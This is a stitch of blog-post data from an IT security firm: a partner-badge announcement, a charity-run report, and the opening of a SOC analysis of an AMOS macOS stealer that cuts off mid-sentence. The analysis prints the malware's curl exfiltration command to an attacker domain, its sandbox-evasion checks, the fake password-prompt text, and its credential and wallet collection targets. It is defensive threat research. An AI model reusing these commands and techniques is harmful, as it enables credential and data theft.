projects",[809,2284,825],{},[809,2286,2287],{},"For a company considering which partner to set up its first productive AI projects with, the Frontier Partner Badge is a shortcut in the selection process, because the badge is awarded by Microsoft directly and signals that this group is capable of bringing AI projects to completion in regulated, security-sensitive environments. In practice, this shifts the conversations between partner, customer, and Microsoft onto a different level, because Frontier Partners sit closer to Microsoft's roadmap and are addressed directly for pilot programs and early releases, while Microsoft account teams bring them in for co-engagements whenever a customer needs technical viability for an AI initiative. At the same time, the recognized partners remain under permanent re-qualification pressure, because those qualifying this year have to qualify again next year, and the requirements catalogue itself shifts from year to year. There is no grandfathering.",{"title":927,"searchDepth":928,"depth":928,"links":2289},[2290,2291,2292],{"id":2240,"depth":928,"text":2241},{"id":2249,"depth":928,"text":2250},{"id":2281,"depth":928,"text":2282},{"lang":940,"seoTitle":2294,"titleClass":942,"date":2295,"categories":2296,"blogtitlepic":2297,"socialimg":2298,"customExcerpt":2299,"keywords":2300,"contactInContent":2301,"hreflang":2333,"published":511,"scripts":2338},"Microsoft Frontier Partner Badge: glueckkanja qualified","2026-06-26",[945],"head-frontier-partner-badge.jpg","/blog/heads/head-frontier-partner-badge.jpg","Microsoft has recently introduced a new top-tier recognition within its AI Cloud Partner Program: the Frontier Partner Badge. It is awarded exclusively to a select circle of partners worldwide who have demonstrated in practice that they can deliver AI projects across the entire Microsoft stack, from workplace and cloud platform to security and the AI application itself. In DACH, only a handful of companies belong to this group, and we are one of them.","Frontier Partner, Microsoft Frontier Partner Badge, Microsoft AI Cloud Partner Program, Solutions Partner Designation, Specialization Copilot, Specialization AI Apps, Specialization Data Security, Microsoft Partner Germany, Microsoft AI Solutions Partner, glueckkanja Microsoft Partner, Copilot Solutions Partner, Modern Work, Security Solutions Partner, Microsoft Partner Center",{"quote":511,"infos":2302},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":2303,"subline":2304,"level":819,"textStyling":956,"flush":957,"person":2305,"form":2316},"Get in touch","Planning AI initiatives on the Microsoft stack and want to know what the Frontier Badge means in practice for your environment? Talk to us. We'll walk through where you stand today and what makes sense as the next step.",{"image":2306,"cloudinary":511,"alt":2307,"name":2308,"quotee":2308,"quoteeTitle":2309,"quote":2310,"detailsHeader":2311,"details":2312},"/people/at-andreas-hoetzinger.png","Andreas Hötzinger, Head of Partner Alliances","Andreas Hötzinger","Head of Partner Alliances","Microsoft deliberately set the bar high with the Frontier Partner Badge. Those who get through have delivered across multiple disciplines, not just one. For customers, that's the shortest answer in the selection process to the question of who can make AI work in the Microsoft stack.","We look forward\u003Cbr />to hearing from you.",[2313,2314],{"text":765,"href":1899,"details":2037,"icon":970},{"text":766,"href":2315,"icon":974},"mailto:info@glueckkanja.com",{"ctaText":976,"cta":2317,"method":938,"action":979,"fields":2318},{"skin":978},[2319,2320,2321,2322,2323,2324,2325,2326,2328,2330,2331,2332],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":1003,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1008,"value":945},{"type":982,"id":1010,"value":2327},"World",{"type":982,"id":1013,"value":2329},"Form: Frontier Partner | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},[2334,2336],{"lang":4,"href":2335},"/de/posts/2026-06-26-frontier-partner",{"lang":1028,"href":2337},"/es/posts/2026-06-26-frontier-partner",{"slick":511,"form":511},"/posts/2026-06-26-frontier-partner",{"title":2231,"description":2237},"posts/2026-06-26-frontier-partner",[1035,2343,1792],"Microsoft Partner","cQ_jGbfS57LGVbRhDLhbHczU2nu8lkvIp-YciNYo5yU",{"id":2346,"title":2347,"author":2348,"body":2349,"cta":767,"description":2353,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":2419,"moment":2421,"navigation":511,"path":2439,"seo":2440,"stem":2441,"tags":2442,"webcast":752,"__hash__":2445},"content_en/posts/2026-06-09-vair-run.md","160 Kilometers for a Good Cause",[1320],{"type":806,"value":2350,"toc":2414},[2351,2354,2358,2360,2369,2373,2375,2384,2387,2393,2397,2399,2402,2408,2411],[809,2352,2353],{},"Sunday morning, 8:30 am, Holbeinsteg on the Main. Eleven colleagues in matching NinjaCat shirts, ready for the Frankfurter Runden. Rain, lightning, and thunder included. Running for a good cause turned out to be all the motivation anyone needed to lace up despite the weather.",[819,2355,2357],{"id":2356},"frankfurt-runs-and-runs-and-runs","Frankfurt runs. And runs. And runs.",[809,2359,825],{},[809,2361,2362,2363,2368],{},"The Frankfurter Runden is a community running event along a 10-kilometer route on the banks of the Main, past the ECB and Hafenpark, with the Frankfurt skyline as a backdrop. What makes it different: participants decide mid-race how many laps they want to run. One to four laps, so anywhere from 10 to 40 kilometers. After each lap, the choice is yours: head for the finish line or keep going. glueckkanja gave its team an extra reason to push on: for every lap completed, glueckkanja donates to ",[813,2364,2367],{"href":2365,"rel":2366},"https://vairein.de/",[1509],"VAIR e.V."," in Offenbach, specifically to the Vairplay project.",[819,2370,2372],{"id":2371},"a-park-for-everyone-right-in-the-heart-of-offenbach","A park for everyone, right in the heart of Offenbach",[809,2374,825],{},[809,2376,2377,2378,2383],{},"VAIR e.V. is building ",[813,2379,2382],{"href":2380,"rel":2381},"https://www.vairplay-of.de/",[1509],"Vairplay"," beneath the Kaiserlei Bridge: the city's first publicly accessible, inclusive sports and cultural park. On a previously neglected stretch of around 10,000 square meters, the plan is to create a space where sport, movement, and culture come together, barrier-free, open to all ages, with tiered stages for events and concerts.",[809,2385,2386],{},"Zijad Doličanin, chair of VAIR e.V., sees it as a place where people can come together, connect, and experience a sense of community, where social and cultural boundaries are crossed and regional ties are strengthened. A gathering place for a city known for its diverse and vibrant community. glueckkanja is an Offenbach company through and through, this is where everything started, many colleagues come from the area, and for us, social responsibility begins where we belong.\npany. This is where it all started, many colleagues come from the region, and for us, social engagement begins where we are rooted.",[2388,2389],"quotes",{":quotes":2390,":no-fullscreen":2391,"spacing":2392},"quoteZijad","true","mb-10",[819,2394,2396],{"id":2395},"_16-laps-one-podium-a-lot-of-cheering","16 laps, one podium, a lot of cheering",[809,2398,825],{},[809,2400,2401],{},"Shortly after the start, the first storm front rolled in over Frankfurt. Heavy rain, lightning, thunder, and a bit of wind. For a moment, people on the course wondered whether the event might be called off. It wasn't. So everyone kept going. The spectators along the Main cheered throughout, which is exactly what you need when you're soaked and on your second lap.",[809,2403,2404],{},[838,2405],{"alt":2406,"src":2407},"Frankfurter Runden with our NinjaCat","https://res.cloudinary.com/c4a8/image/upload/blog/pics/frankfurter-runden.jpg",[809,2409,2410],{},"The team pushed each other along too, and it showed. By the end of the morning, the glueckkanja crew had completed 16 laps in total. Eight colleagues ran one lap, two went for two. And then there was Lisa, who finished her first lap and just kept running. Then finished her second and kept going again. 30 kilometers, a time of 2:18:50, second place in the overall women's standings, first place in her age group. The team stayed until the very end of the awards ceremony and cheered every second of it.",[809,2412,2413],{},"160 kilometers came together that morning, one after another, in the rain, and every single one of them goes toward a park that Offenbach doesn't have yet. The team will be back in 2027, rain or shine.",{"title":927,"searchDepth":928,"depth":928,"links":2415},[2416,2417,2418],{"id":2356,"depth":928,"text":2357},{"id":2371,"depth":928,"text":2372},{"id":2395,"depth":928,"text":2396},{"lang":940,"seoTitle":2420,"titleClass":942,"date":2421,"categories":2422,"blogtitlepic":2423,"socialimg":2424,"customExcerpt":2425,"keywords":2426,"hreflang":2427,"scripts":2432,"quoteZijad":2433},"Frankfurter Runden 2026: glueckkanja runs 160 kilometers for VAIR e.V. Offenbach","2026-06-08",[945],"frankfurter-runden.png","/blog/heads/frankfurter-runden.png","Eleven colleagues, 16 laps, 160 kilometers, a thunderstorm, and a podium finish: glueckkanja took part in the Frankfurter Runden 2026 and donated to VAIR e.V. for every lap completed, supporting an inclusive sports and cultural park in Offenbach.","Frankfurter Runden, charity run Frankfurt, CSR IT company, social engagement Offenbach, team building Offenbach, top employer Rhine-Main, Vairein Offenbach, VAIR e.V. Offenbach, Vairplay Offenbach, glueckkanja Offenbach, employer branding IT, company culture IT, IT company Offenbach, community sports Frankfurt, inclusive park Offenbach, working at glueckkanja",[2428,2430],{"lang":4,"href":2429},"/de/posts/2026-06-09-vair-run",{"lang":1028,"href":2431},"/es/posts/2026-06-09-vair-run",{"slick":511,"form":511},{"items":2434},[2435],{"text":2436,"name":2437,"company":2438,"alt":2437},"The engagement of local companies sends an important signal of social responsibility and lived connection to the region. Partnerships like these make sustainable projects possible, create value for the community, and show what we can achieve together.","Zijad Doličanin","Chairman VAIR e.V.","/posts/2026-06-09-vair-run",{"title":2347,"description":2353},"posts/2026-06-09-vair-run",[2443,2225,2444],"Top Employer","Social Engagement","XppGuU3dAB23HM8FpOJjYGR7VYc4b4ykn9e7QyKdjT0",{"id":2447,"title":2448,"author":2449,"body":2450,"cta":767,"description":2454,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":4586,"moment":4588,"navigation":511,"path":4641,"seo":4642,"stem":4643,"tags":4644,"webcast":752,"__hash__":4650},"content_en/posts/2026-04-10-incident-to-intelligence.md","Anatomy of an Unknown AMOS Stealer: From Alert to Immunity in Hours",[1301],{"type":806,"value":2451,"toc":4550},[2452,2455,2458,2461,2464,2468,2470,2473,2476,2478,2482,2485,2488,2501,2504,2507,2515,2518,2522,2524,2527,2548,2551,2559,2562,2570,2577,2581,2583,2586,2594,2609,2613,2615,2618,2622,2625,2633,2637,2639,2647,2651,2653,2656,2660,2662,2665,2673,2677,2679,2686,2689,2786,2789,2819,2821,2825,2827,2833,2836,2840,2842,2925,2929,2931,2942,2949,3022,3033,3040,3044,3046,3111,3115,3117,3124,3126,3130,3132,3139,3165,3351,3354,3362,3373,3376,3384,3398,3411,3413,3417,3419,3437,3459,3649,3652,3660,3663,3666,3668,3672,3674,3677,3754,3757,3776,3855,3858,3860,3864,3866,3869,3876,3931,3934,3942,3945,3947,3951,3953,3960,3973,4021,4032,4071,4080,4095,4098,4100,4104,4106,4113,4116,4124,4127,4135,4149,4152,4154,4158,4160,4170,4174,4176,4195,4203,4217,4237,4241,4243,4246,4254,4257,4265,4279,4283,4285,4288,4296,4315,4321,4325,4327,4335,4341,4348,4352,4354,4362,4366,4368,4371,4379,4382,4386,4388,4396,4400,4402,4410,4414,4416,4424,4428,4430,4438,4458,4463,4465,4469,4471,4478,4495,4498,4511,4513,4517,4519,4522,4525,4528,4530,4546],[809,2453,2454],{},"When an alert fires in our SOC, the clock starts. But not just for the affected customer, for every customer we protect. In the modern threat landscape, the most dangerous moment for any organization is the intelligence gap: that window of time between a new malware variant being deployed and the rest of the world finding out it exists.",[809,2456,2457],{},"For a standalone security team, this gap is a period of extreme vulnerability. You are essentially waiting for a vendor update or a public signature feed that hasn't been written yet. But for our customers, that gap is closed by the power of our inhouse developed Shared Threat Intelligence.",[809,2459,2460],{},"This blogpost is the technical breakdown of how we dismantled a previously undocumented AMOS (Atomic macOS Stealer) variant. It's a story of moving from a single compromised endpoint to rapid deployment of detection and blocking capabilities across customer environments.",[2462,2463],"hr",{},[1938,2465,2467],{"id":2466},"the-incident-a-unknown-ioc-scenario","The Incident: A unknown IOC Scenario",[809,2469,825],{},[809,2471,2472],{},"The alert arrived on March 12, 2026 at 06:25 local time. A macOS endpoint had been compromised. By the time our SOC began analysing the artefacts, we were looking at a situation every threat analyst dreads: No known file hashes, C2 IP addresses, or meaningful behavioral signatures existed in public databases at the time of detection.",[809,2474,2475],{},"The full architecture of the attack only became clear during the subsequent deep-dive analysis. We discovered that the infection relied on a 15.7 MB macOS Universal Binary (x86_64 and ARM64) dropped at /private/tmp/helper. This sample was not readily available on the system; our team had to reconstruct the infection chain and simulate the original delivery request to manually retrieve the binary from the attacker's infrastructure.",[2462,2477],{},[819,2479,2481],{"id":2480},"stage-1-sandbox-checks","Stage 1: Sandbox checks",[809,2483,2484],{},"{: .h4-font-size}",[809,2486,2487],{},"Before the malicious stealer itself was executed on the machine, an Apple Script payload had already executed. Every string in it, every file path, every shell command, every URL, was encoded using three custom arithmetic functions:",[2489,2490,2492],"div",{"style":2491},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[2493,2494,2498],"pre",{"className":2495,"code":2497,"language":987},[2496],"language-text","on ipbgcjzgqa(a, b)\n    -- result[i] = chr(a[i] - b[i])\n\non kwcvvjininv(a, b)\n    -- result[i] = chr(a[i] + b[i])\n\non xqylheckjx(a, b, offset)\n    -- result[i] = chr(a[i] - b[i] - offset)\n",[2499,2500,2497],"code",{"__ignoreMap":927},[809,2502,2503],{},"None of the strings appear anywhere in plaintext. What looked like meaningless integer arrays at first glance decoded, once we had reversed the encoding scheme, to a complete, fully operational data theft and exfiltration framework.",[809,2505,2506],{},"We decoded every array in the script statically. The results were unambiguous:",[2489,2508,2509],{"style":2491},[2493,2510,2513],{"className":2511,"code":2512,"language":987},[2496],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[2499,2514,2512],{"__ignoreMap":927},[809,2516,2517],{},"The download URL was deliberately crafted to impersonate a legitimate n8n workflow automation update, a tool commonly used by developers and DevOps engineers. This is not a random choice. It signals a targeted campaign aimed at technically sophisticated users, not generic end users who might install cracked software.",[819,2519,2521],{"id":2520},"the-anti-sandbox-check","The Anti-Sandbox Check",[809,2523,2484],{},[809,2525,2526],{},"Before any download occurred, the script ran a dedicated VM and sandbox detection routine. We also recovered a standalone anti-sandbox script from the incident artefacts:",[2489,2528,2529],{"style":2491},[2493,2530,2534],{"className":2531,"code":2532,"language":2533,"meta":927,"style":927},"language-applescript shiki shiki-themes github-light github-dark","set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[2499,2535,2536,2543],{"__ignoreMap":927},[919,2537,2540],{"class":2538,"line":2539},"line",1,[919,2541,2542],{},"set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\n",[919,2544,2545],{"class":2538,"line":928},[919,2546,2547],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[809,2549,2550],{},"The results were then checked against two lists. The first checked for virtualisation markers in memory data:",[2489,2552,2553],{"style":2491},[2493,2554,2557],{"className":2555,"code":2556,"language":987},[2496],"\"QEMU\"   \"VMware\"   \"KVM\"\n",[2499,2558,2556],{"__ignoreMap":927},[809,2560,2561],{},"The second checked hardware identifiers against a set of known analysis machine serial numbers:",[2489,2563,2564],{"style":2491},[2493,2565,2568],{"className":2566,"code":2567,"language":987},[2496],"\"Z31FHXYQ0J\"     -- known sandbox machine serial\n\"C07T508TG1J2\"   -- known sandbox machine serial\n\"C02TM2ZBHX87\"   -- known sandbox machine serial\n\"Chip: Unknown\"  -- emulation indicator\n\"Intel Core 2\"   -- legacy/VM indicator\n",[2499,2569,2567],{"__ignoreMap":927},[809,2571,2572,2573,2576],{},"If any match was found: ",[2499,2574,2575],{},"exit 100",", complete termination. On a real MacBook Pro with an Apple Silicon chip, all checks pass silently and execution continues. This is a professional-grade sandbox evasion technique, and it was running before a single byte of the binary had been downloaded.",[819,2578,2580],{"id":2579},"simple-but-effective-privilege-escalation-the-fake-password-dialog","Simple but effective privilege escalation: The fake password dialog",[809,2582,2484],{},[809,2584,2585],{},"The decoded script also contained the text used for privilege escalation via social engineering:",[2489,2587,2588],{"style":2491},[2493,2589,2592],{"className":2590,"code":2591,"language":987},[2496],"Title:   \"Application wants to install helper\"\nPrompt:  \"Required Application Helper. Please enter device\n          password to continue.\"\nButton:  \"Continue\"\n",[2499,2593,2591],{"__ignoreMap":927},[809,2595,2596,2597,2600,2601,2604,2605,2608],{},"This dialog is displayed using a standard macOS ",[2499,2598,2599],{},"display dialog"," call with ",[2499,2602,2603],{},"with hidden answer",", visually indistinguishable from a legitimate macOS authorisation prompt. The entered password was used to invoke ",[2499,2606,2607],{},"login -pf \u003Cusername>",", elevating the process to root before the binary was ever executed.",[819,2610,2612],{"id":2611},"what-the-script-collected","What the Script Collected",[809,2614,2484],{},[809,2616,2617],{},"Once the binary had run, the osascript continued its own collection workflow, targeting every category of sensitive data on the system. We decoded all collection paths and targets:",[897,2619,2621],{"id":2620},"browser-data-all-chromium-browsers-safari","Browser data (all Chromium browsers + Safari):",[809,2623,2624],{},"{: .font-size-4}",[2489,2626,2627],{"style":2491},[2493,2628,2631],{"className":2629,"code":2630,"language":987},[2496],"/Login Data          /Cookies            /Web Data\n/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/\n",[2499,2632,2630],{"__ignoreMap":927},[897,2634,2636],{"id":2635},"macos-keychain","macOS Keychain:",[809,2638,2624],{},[2489,2640,2641],{"style":2491},[2493,2642,2645],{"className":2643,"code":2644,"language":987},[2496],"~/Library/Keychains/login.keychain-db  -- accessed directly via cat\n",[2499,2646,2644],{"__ignoreMap":927},[897,2648,2650],{"id":2649},"apple-notes","Apple Notes",[809,2652,2624],{},[809,2654,2655],{},"Complete content exported as HTML with count header",[897,2657,2659],{"id":2658},"local-files","Local files",[809,2661,2624],{},[809,2663,2664],{},"Desktop and Documents, up to 30 MB, targeting:",[2489,2666,2667],{"style":2491},[2493,2668,2671],{"className":2669,"code":2670,"language":987},[2496],"pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf\nkey  p12  pem  cert  pfx  sql  db  sqlite\njson  xml  yaml  conf  env  csv\n",[2499,2672,2670],{"__ignoreMap":927},[897,2674,2676],{"id":2675},"cryptocurrency-wallets","Cryptocurrency wallets",[809,2678,2624],{},[809,2680,2681,2682,2685],{},"A hardcoded list of ",[1655,2683,2684],{},"200+ browser extension IDs"," targeting every major wallet including MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI, and Exodus.",[809,2687,2688],{},"After collection, everything was staged in a randomly-named temporary directory and sent:",[2489,2690,2691],{"style":2491},[2493,2692,2696],{"className":2693,"code":2694,"language":2695,"meta":927,"style":927},"language-bash shiki shiki-themes github-light github-dark","ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n  -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n  -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n","bash",[2499,2697,2698,2732,2758,2774],{"__ignoreMap":927},[919,2699,2700,2704,2708,2711,2714,2718,2722,2726,2729],{"class":2538,"line":2539},[919,2701,2703],{"class":2702},"sScJk","ditto",[919,2705,2707],{"class":2706},"sj4cs"," -c",[919,2709,2710],{"class":2706}," -k",[919,2712,2713],{"class":2706}," --sequesterRsrc",[919,2715,2717],{"class":2716},"szBVR"," \u003C",[919,2719,2721],{"class":2720},"sZZnC","staging_di",[919,2723,2725],{"class":2724},"sVt8B","r",[919,2727,2728],{"class":2716},">",[919,2730,2731],{"class":2720}," /tmp/out.zip\n",[919,2733,2734,2737,2740,2743,2746,2749,2752,2755],{"class":2538,"line":928},[919,2735,2736],{"class":2702},"curl",[919,2738,2739],{"class":2706}," --connect-timeout",[919,2741,2742],{"class":2706}," 120",[919,2744,2745],{"class":2706}," --max-time",[919,2747,2748],{"class":2706}," 300",[919,2750,2751],{"class":2706}," -X",[919,2753,2754],{"class":2720}," POST",[919,2756,2757],{"class":2706}," \\\n",[919,2759,2760,2763,2766,2769,2772],{"class":2538,"line":935},[919,2761,2762],{"class":2706},"  -H",[919,2764,2765],{"class":2720}," \"user: \u003Cuuid>\"",[919,2767,2768],{"class":2706}," -H",[919,2770,2771],{"class":2720}," \"BuildID: \u003Chw_profile>\"",[919,2773,2757],{"class":2706},[919,2775,2777,2780,2783],{"class":2538,"line":2776},4,[919,2778,2779],{"class":2706},"  -F",[919,2781,2782],{"class":2720}," \"file=@/tmp/out.zip\"",[919,2784,2785],{"class":2720}," laislivon[.]com/contact\n",[809,2787,2788],{},"Cleanup followed immediately:",[2489,2790,2791],{"style":2491},[2493,2792,2794],{"className":2693,"code":2793,"language":2695,"meta":927,"style":927},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[2499,2795,2796,2813],{"__ignoreMap":927},[919,2797,2798,2801,2804,2806,2808,2810],{"class":2538,"line":2539},[919,2799,2800],{"class":2702},"rm",[919,2802,2803],{"class":2706}," -r",[919,2805,2717],{"class":2716},[919,2807,2721],{"class":2720},[919,2809,2725],{"class":2724},[919,2811,2812],{"class":2716},">\n",[919,2814,2815,2817],{"class":2538,"line":928},[919,2816,2800],{"class":2702},[919,2818,2731],{"class":2720},[2462,2820],{},[1938,2822,2824],{"id":2823},"stage-2-reverse-engineering-the-helper-binary","Stage 2: Reverse Engineering the 'helper' Binary",[809,2826,825],{},[809,2828,1962,2829,2832],{},[2499,2830,2831],{},"helper"," binary is where this analysis gets deep. This is a purpose-built, professionally obfuscated macOS executable designed to be as difficult as possible to analyse statically, and it is the part of this investigation that required the most significant reverse engineering effort.",[809,2834,2835],{},"All analysis was performed using Ghidra with our custom ARM64 analysis workflow.",[819,2837,2839],{"id":2838},"file-properties","File Properties",[809,2841,2484],{},[2489,2843,2845],{"style":2844},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[2846,2847,895,2849,895,2865],"table",{"style":2848},"width:100%; border-collapse: collapse; font-size: 0.85rem",[2850,2851,2852,2853,895],"thead",{},"\n    ",[2854,2855,2856,2857,2856,2862,2852],"tr",{},"\n      ",[2858,2859,2861],"th",{"style":2860},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Property",[2858,2863,2864],{"style":2860},"Value",[2866,2867,2852,2868,2852,2878,2852,2887,2852,2895,2852,2905,2852,2915,895],"tbody",{},[2854,2869,2856,2870,2856,2875,2852],{},[2871,2872,2874],"td",{"style":2873},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Format",[2871,2876,2877],{"style":2873},"Mach-O Universal Binary",[2854,2879,2856,2880,2856,2884,2852],{},[2871,2881,2883],{"style":2882},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Architectures",[2871,2885,2886],{"style":2882},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[2854,2888,2856,2889,2856,2892,2852],{},[2871,2890,2891],{"style":2873},"Size",[2871,2893,2894],{"style":2873},"15.7 MB",[2854,2896,2856,2897,2856,2900,2852],{},[2871,2898,2899],{"style":2882},"MD5",[2871,2901,2902],{"style":2882},[2499,2903,2904],{},"4599fdf2fa2099b30d8bbf76703dd634",[2854,2906,2856,2907,2856,2910,2852],{},[2871,2908,2909],{"style":2873},"SHA-1",[2871,2911,2912],{"style":2873},[2499,2913,2914],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[2854,2916,2856,2917,2856,2920,2852],{},[2871,2918,2919],{"style":2882},"SHA-256",[2871,2921,2922],{"style":2882},[2499,2923,2924],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[819,2926,2928],{"id":2927},"it-starts-before-main","It Starts Before main()",[809,2930,2484],{},[809,2932,2933,2934,2937,2938,2941],{},"The first thing we confirmed in Ghidra was that this binary does not behave like a normal executable. The real entry point is not ",[2499,2935,2936],{},"main()",". It is a function registered in ",[2499,2939,2940],{},"__mod_init_func",", a macOS mechanism that instructs the dynamic linker (dyld) to execute designated functions automatically when the binary is loaded, before any user-visible code runs.",[809,2943,2944,2945,2948],{},"The init function at ",[2499,2946,2947],{},"0x10009f384"," is the true entry point of the malware. We decompiled the output with Ghidra:",[2489,2950,2951],{"style":2491},[2952,2953,2954,2958,2961,2964,1658,2968,2972,2973,2975,2976,2979,2980,2994],"code-block",{},[919,2955,2957],{"style":2956},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[2959,2960],"br",{},[919,2962,2963],{"style":2956},"// __mod_init_func registered — executes before main()",[919,2965,2967],{"style":2966},"color:#d73a49","void",[919,2969,2971],{"style":2970},"color:#6f42c1","FUN_10009f384","(",[919,2974,2967],{"style":2966},")\n{\n  ",[919,2977,2978],{"style":2966},"int"," iVar1;\n",[809,2981,2982,2985,2986,2972,2989,2993],{},[919,2983,2984],{"style":2956},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[919,2987,2988],{"style":2970},"_usleep",[919,2990,2992],{"style":2991},"color:#005cc5","0x37e",");",[809,2995,2996,2999,3002,3003,3005,3006,3009,3010,3013,3014,3017,3018,3021],{},[919,2997,2998],{"style":2956},"// Indirect jump table — 14-state machine",[919,3000,3001],{"style":2956},"// Defeats CFG reconstruction in static analysis tools","\n(_(",[919,3004,2499],{"style":2966}," _)((",[919,3007,3008],{"style":2966},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[919,3011,3012],{"style":2991},"4"," + ",[919,3015,3016],{"style":2991},"0x10009f440","))(iVar1);\n",[919,3019,3020],{"style":2966},"return",";\n}",[809,3023,3024,3025,3028,3029,3032],{},"Two things are immediately notable. First, the 894-microsecond ",[2499,3026,3027],{},"usleep"," at startup, an anti-sandbox timing signal. Second, and more significantly, the indirect jump table at ",[2499,3030,3031],{},"0x10009f43c",". This is a computed branch where the target address is calculated at runtime from a lookup table. Static analysis tools cannot reconstruct the control flow graph from this, Ghidra itself logs multiple \"unreachable block\" warnings as it tries and fails to trace the execution path. This is deliberate.",[809,3034,3035,3036,3039],{},"The jump table drives a ",[1655,3037,3038],{},"14-state execution machine",". Each state performs one discrete step of the decryption and execution pipeline. The state counter is updated after each step, and the machine loops until all states have executed.",[819,3041,3043],{"id":3042},"the-arm64-disassembly-of-the-state-dispatcher","The ARM64 Disassembly of the State Dispatcher",[809,3045,2484],{},[2489,3047,3048],{"style":2491},[2493,3049,3053],{"className":3050,"code":3051,"language":3052,"meta":927,"style":927},"language-asm shiki shiki-themes github-light github-dark","10009f3fc:  stp xzr,xzr,[sp, #0x48]\n10009f41c:  mov w0,#0x37e\n10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n10009f428:  b.hi 0x10009fd44         ; exit if done\n10009f42c:  mov w8,w25               ; current state index\n10009f430:  adr x9,0x10009f440       ; base of jump table\n10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n10009f43c:  br x9                    ; indirect branch, CFG broken here\n","asm",[2499,3054,3055,3060,3065,3070,3075,3081,3087,3093,3099,3105],{"__ignoreMap":927},[919,3056,3057],{"class":2538,"line":2539},[919,3058,3059],{},"10009f3fc:  stp xzr,xzr,[sp, #0x48]\n",[919,3061,3062],{"class":2538,"line":928},[919,3063,3064],{},"10009f41c:  mov w0,#0x37e\n",[919,3066,3067],{"class":2538,"line":935},[919,3068,3069],{},"10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n",[919,3071,3072],{"class":2538,"line":2776},[919,3073,3074],{},"10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n",[919,3076,3078],{"class":2538,"line":3077},5,[919,3079,3080],{},"10009f428:  b.hi 0x10009fd44         ; exit if done\n",[919,3082,3084],{"class":2538,"line":3083},6,[919,3085,3086],{},"10009f42c:  mov w8,w25               ; current state index\n",[919,3088,3090],{"class":2538,"line":3089},7,[919,3091,3092],{},"10009f430:  adr x9,0x10009f440       ; base of jump table\n",[919,3094,3096],{"class":2538,"line":3095},8,[919,3097,3098],{},"10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[919,3100,3102],{"class":2538,"line":3101},9,[919,3103,3104],{},"10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n",[919,3106,3108],{"class":2538,"line":3107},10,[919,3109,3110],{},"10009f43c:  br x9                    ; indirect branch, CFG broken here\n",[819,3112,3114],{"id":3113},"six-obfuscation-layers-stacked","Six Obfuscation Layers, Stacked",[809,3116,2484],{},[809,3118,3119,3120,3123],{},"The binary uses six distinct obfuscation layers, stacked and chained so that the output of each feeds the next. Every payload, every string, every internal constant is encoded. Nothing meaningful appears in plaintext anywhere in the ",[2499,3121,3122],{},"__const"," segment. What follows is a complete layer-by-layer breakdown, verified directly in Ghidra, down to the individual ARM64 instructions. While each individual technique used in this binary is known in isolation, their chained application across multiple stages created a highly interdependent execution flow that significantly increased the complexity of static and dynamic analysis.",[2462,3125],{},[897,3127,3129],{"id":3128},"layer-1-compile-time-triplet-encoding","Layer 1 — Compile-Time Triplet Encoding",[809,3131,2624],{},[809,3133,3134,3135,3138],{},"Every string in the binary is stored not as characters, but as a sequence of 12-byte arithmetic triplets. Each triplet ",[2499,3136,3137],{},"(a, b, shift)"," encodes exactly one output character. The encoding scheme is applied at compile time — meaning no string ever exists as plaintext in the binary, not even transiently during loading.",[809,3140,3141,3142,3145,3146,3149,3150,3153,3154,3145,3157,3160,3161,3164],{},"Two separate decoder functions handle different string sizes. ",[2499,3143,3144],{},"FUN_100087c08"," at ",[2499,3147,3148],{},"0x100087c08"," decodes 60-character strings (720 bytes of input data from ",[2499,3151,3152],{},"DAT_1006292cc","). ",[2499,3155,3156],{},"FUN_10007ad80",[2499,3158,3159],{},"0x10007ad80"," decodes 56-character strings (672 bytes from ",[2499,3162,3163],{},"DAT_10049708c","). Both use the identical 